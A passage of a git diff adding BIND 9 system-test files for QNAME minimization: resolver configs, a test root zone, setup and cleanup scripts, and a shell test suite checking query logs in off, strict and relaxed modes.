except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break diff --git a/bin/tests/system/qmin/clean.sh b/bin/tests/system/qmin/clean.sh new file mode 100644 index 0000000..172a423 --- /dev/null +++ b/bin/tests/system/qmin/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.conf +rm -f */named.memstats +rm -f */named.run +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ans*/query.log* +rm -f query*.log diff --git a/bin/tests/system/qmin/ns1/named.conf.in b/bin/tests/system/qmin/ns1/named.conf.in new file mode 100644 index 0000000..e366cca --- /dev/null +++ b/bin/tests/system/qmin/ns1/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/qmin/ns1/root.db b/bin/tests/system/qmin/ns1/root.db new file mode 100644 index 0000000..325f607 --- /dev/null +++ b/bin/tests/system/qmin/ns1/root.db @@ -0,0 +1,41 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 20 +. IN SOA wpk.isc.org. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 2 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 +ip6.arpa. NS ns2.good. + +good. NS ns2.good. +ns2.good. A 10.53.0.2 + +bad. NS ns2.bad. +ns2.bad. A 10.53.0.2 + +slow NS ns2.slow. +ns2.slow. A 10.53.0.2 + +ugly. NS ns2.ugly. +ns2.ugly. A 10.53.0.2 + +fwd. NS ns2.fwd. +ns2.fwd. A 10.53.0.2 + +$TTL 2 +stale. NS ns2.stale. +ns2.stale. A 10.53.0.2 diff --git a/bin/tests/system/qmin/ns5/named.conf.in b/bin/tests/system/qmin/ns5/named.conf.in new file mode 100644 index 0000000..7d9e9e6 --- /dev/null +++ b/bin/tests/system/qmin/ns5/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + qname-minimization disabled; + querylog yes; + resolver-query-timeout 30; + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/qmin/ns6/named.conf.in b/bin/tests/system/qmin/ns6/named.conf.in new file mode 100644 index 0000000..36651f2 --- /dev/null +++ b/bin/tests/system/qmin/ns6/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion yes; + qname-minimization strict; + querylog yes; + resolver-query-timeout 30; + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/qmin/ns7/named.conf.in b/bin/tests/system/qmin/ns7/named.conf.in new file mode 100644 index 0000000..32b8b48 --- /dev/null +++ b/bin/tests/system/qmin/ns7/named.conf.in @@ -0,0 +1,51 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS7 + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion yes; + qname-minimization relaxed; + querylog yes; + resolver-query-timeout 30; + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "fwd." IN { + type forward; + forwarders { + 10.53.0.2; + }; + forward only; +}; diff --git a/bin/tests/system/qmin/prereq.sh b/bin/tests/system/qmin/prereq.sh new file mode 100644 index 0000000..aa97ae2 --- /dev/null +++ b/bin/tests/system/qmin/prereq.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/qmin/setup.sh b/bin/tests/system/qmin/setup.sh new file mode 100644 index 0000000..8af413f --- /dev/null +++ b/bin/tests/system/qmin/setup.sh @@ -0,0 +1,20 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf diff --git a/bin/tests/system/qmin/tests.sh b/bin/tests/system/qmin/tests.sh new file mode 100755 index 0000000..728d535 --- /dev/null +++ b/bin/tests/system/qmin/tests.sh @@ -0,0 +1,541 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" +CLEANQL="rm -f ans*/query.log" +status=0 +n=0 + +n=$((n+1)) +echo_i "query for .good is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.good. @10.53.0.5 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.good. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR icky.icky.icky.ptang.zoop.boing.good. +ADDR ns3.good. +ADDR ns3.good. +ADDR a.bit.longer.ns.name.good. +ADDR a.bit.longer.ns.name.good. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.good." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.good." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .bad is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.bad. @10.53.0.5 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.bad. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR icky.icky.icky.ptang.zoop.boing.bad. +ADDR ns3.bad. +ADDR ns3.bad. +ADDR a.bit.longer.ns.name.bad. +ADDR a.bit.longer.ns.name.bad. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.bad." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.bad." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .slow is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.slow. @10.53.0.5 > dig.out.test$n +sleep 5 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.slow. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR icky.icky.icky.ptang.zoop.boing.slow. +ADDR ns3.slow. +ADDR ns3.slow. +ADDR a.bit.longer.ns.name.slow. +ADDR a.bit.longer.ns.name.slow. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.slow." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.slow." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .ugly is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.ugly. @10.53.0.5 > dig.out.test$n +sleep 5 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.ugly. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR icky.icky.icky.ptang.zoop.boing.ugly. +ADDR ns3.ugly. +ADDR ns3.ugly. +ADDR a.bit.longer.ns.name.ugly. +ADDR a.bit.longer.ns.name.ugly. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.ugly." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.ugly." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .good is properly minimized when qname-minimization is in strict mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.good. @10.53.0.6 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.good. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR a.bit.longer.ns.name.good. +ADDR a.bit.longer.ns.name.good. +ADDR ns2.good. +ADDR ns3.good. +ADDR ns3.good. +NS boing.good. +NS good. +NS zoop.boing.good. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +NS zoop.boing.good. +NS ptang.zoop.boing.good. +NS icky.ptang.zoop.boing.good. +__EOF +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +NS icky.ptang.zoop.boing.good. +NS icky.icky.ptang.zoop.boing.good. +ADDR icky.icky.icky.ptang.zoop.boing.good. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .good is properly minimized when qname-minimization is in relaxed mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.good. @10.53.0.7 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.good. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.boing.good. +ADDR _.zoop.boing.good. +ADDR a.bit.longer.ns.name.good. +ADDR a.bit.longer.ns.name.good. +ADDR ns2.good. +ADDR ns3.good. +ADDR ns3.good. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +ADDR _.ptang.zoop.boing.good. +ADDR _.icky.ptang.zoop.boing.good. +__EOF +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +ADDR _.icky.icky.ptang.zoop.boing.good. +ADDR icky.icky.icky.ptang.zoop.boing.good. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .bad fails when qname-minimization is in strict mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.bad. @10.53.0.6 > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR ns2.bad. +NS bad. +NS boing.bad. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .bad succeeds when qname-minimization is in relaxed mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.bad. @10.53.0.7 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.bad. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.boing.bad. +ADDR _.zoop.boing.bad. +ADDR a.bit.longer.ns.name.bad. +ADDR a.bit.longer.ns.name.bad. +ADDR ns2.bad. +ADDR ns3.bad. +ADDR ns3.bad. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +ADDR _.ptang.zoop.boing.bad. +ADDR _.icky.ptang.zoop.boing.bad. +__EOF +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +ADDR _.icky.icky.ptang.zoop.boing.bad. +ADDR icky.icky.icky.ptang.zoop.boing.bad. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .ugly fails when qname-minimization is in strict mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.ugly. @10.53.0.6 > dig.out.test$n +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR ns2.ugly. +NS boing.ugly. +NS boing.ugly. +NS ugly. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +$RNDCCMD 10.53.0.6 flush + +n=$((n+1)) +echo_i "query for .ugly succeeds when qname-minimization is in relaxed mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.ugly. @10.53.0.7 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.ugly. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 + +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.boing.ugly. +ADDR _.boing.ugly. +ADDR a.bit.longer.ns.name.ugly. +ADDR a.bit.longer.ns.name.ugly. +ADDR icky.icky.icky.ptang.zoop.boing.ugly. +ADDR ns2.ugly. +ADDR ns3.ugly. +ADDR ns3.ugly. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.ugly." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.ugly." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +$RNDCCMD 10.53.0.7 flush + +n=$((n+1)) +echo_i "information that minimization was unsuccessful for .ugly is logged ($n)" +ret=0 +grep "success resolving 'icky.icky.icky.ptang.zoop.boing.ugly/A' after disabling qname minimization due to 'FORMERR'" ns7/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .slow is properly minimized when qname-minimization is on ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.slow. @10.53.0.6 > dig.out.test$n +sleep 5 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.slow. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR a.bit.longer.ns.name.slow. +ADDR a.bit.longer.ns.name.slow. +ADDR ns2.slow. +ADDR ns3.slow. +ADDR ns3.slow. +NS boing.slow. +NS slow. +NS zoop.boing.slow. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +NS zoop.boing.slow. +NS ptang.zoop.boing.slow. +NS icky.ptang.zoop.boing.slow. +__EOF +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +NS icky.ptang.zoop.boing.slow. +NS icky.icky.ptang.zoop.boing.slow. +ADDR icky.icky.icky.ptang.zoop.boing.slow. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .ip6.arpa succeeds and skips on proper boundaries when qname-minimization is on ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS -x 2001:4f8::1 @10.53.0.6 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. 1 IN PTR nee.com." dig.out.test$n > /dev/null || ret=1 +sleep 1 +grep -v ADDR ans2/query.log > ans2/query.log.trimmed +cat << __EOF | $DIFF ans2/query.log.trimmed - > /dev/null || ret=1 +NS 1.0.0.2.ip6.arpa. +NS 8.f.4.0.1.0.0.2.ip6.arpa. +NS 0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. +NS 0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. +NS 0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. +PTR 1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for multiple label name skips after 7th label ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS more.icky.icky.icky.ptang.zoop.boing.good. @10.53.0.6 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "more.icky.icky.icky.ptang.zoop.boing.good. 1 IN A 192.0.2.2" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR a.bit.longer.ns.name.good. +ADDR a.bit.longer.ns.name.good. +ADDR ns2.good. +ADDR ns3.good. +ADDR ns3.good. +NS boing.good. +NS good. +NS zoop.boing.good. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +NS zoop.boing.good. +NS ptang.zoop.boing.good. +NS icky.ptang.zoop.boing.good. +__EOF +# There's no NS icky.icky.icky.ptang.zoop.boing.good. query - we skipped it. +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +NS icky.ptang.zoop.boing.good. +NS icky.icky.ptang.zoop.boing.good. +ADDR more.icky.icky.icky.ptang.zoop.boing.good. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "qname minimization is disabled when forwarding ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS a.bit.longer.ns.name.fwd. @10.53.0.7 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a.bit.longer.ns.name.fwd. 1 IN A 10.53.0.4" dig.out.test$n >/dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR a.bit.longer.ns.name.fwd. +__EOF +for ans in ans2; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "qname minimization resolves unusual ip6.arpa. names ($n)" +ret=0 +$CLEANQL +$DIG $DIGOPTS test1.test2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa. txt @10.53.0.7 > dig.out.test$n 2>&1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +# Expected output in dig.out.test$n: +# ;; ANSWER SECTION: +# test1.test2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa. 1 IN TXT "long_ip6_name" +grep 'ip6\.arpa.*TXT.*long_ip6_name' dig.out.test$n > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Below are test cases for GL #2665: The QNAME minimization (if enabled) should +# also occur on the second query, after the RRsets have expired from cache. +# BIND will still have the entries in cache, but marked stale. These stale +# entries should not prevent the resolver from minimizing the QNAME. +# We query for the test domain a.b.stale. in all cases (QNAME minimization off, +# strict mode, and relaxed mode) and expect it to behave the same the second +# time when we have a stale delegation structure in cache. +n=$((n+1)) +echo_i "query for .stale is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS @10.53.0.5 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*peekaboo" dig.out.test$n > /dev/null || ret=1 +sleep 1 +echo "TXT a.b.stale." | $DIFF ans2/query.log - > /dev/null || ret=1 +echo "TXT a.b.stale." | $DIFF ans3/query.log - > /dev/null || ret=1 +test -f ans4/query.log && ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .stale is properly minimized when qname-minimization is in strict mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS @10.53.0.6 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*hooray" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR ns.b.stale. +ADDR ns2.stale. +NS b.stale. +NS stale. +__EOF +test -f ans3/query.log && ret=1 +sort ans4/query.log > ans4/query.log.sorted +cat << __EOF | $DIFF ans4/query.log.sorted - > /dev/null || ret=1 +ADDR ns.b.stale. +NS b.stale. +TXT a.b.stale. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .stale is properly minimized when qname-minimization is in relaxed mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS @10.53.0.7 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*hooray" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.b.stale. +ADDR ns.b.stale. +ADDR ns2.stale. +__EOF +test -f ans3/query.log && ret=1 +sort ans4/query.log > ans4/query.log.sorted +cat << __EOF | $DIFF ans4/query.log.sorted - > /dev/null || ret=1 +ADDR ns.b.stale. +TXT a.b.stale. +__EOF +for ans in ans2 ans3 ans4; do mv -f 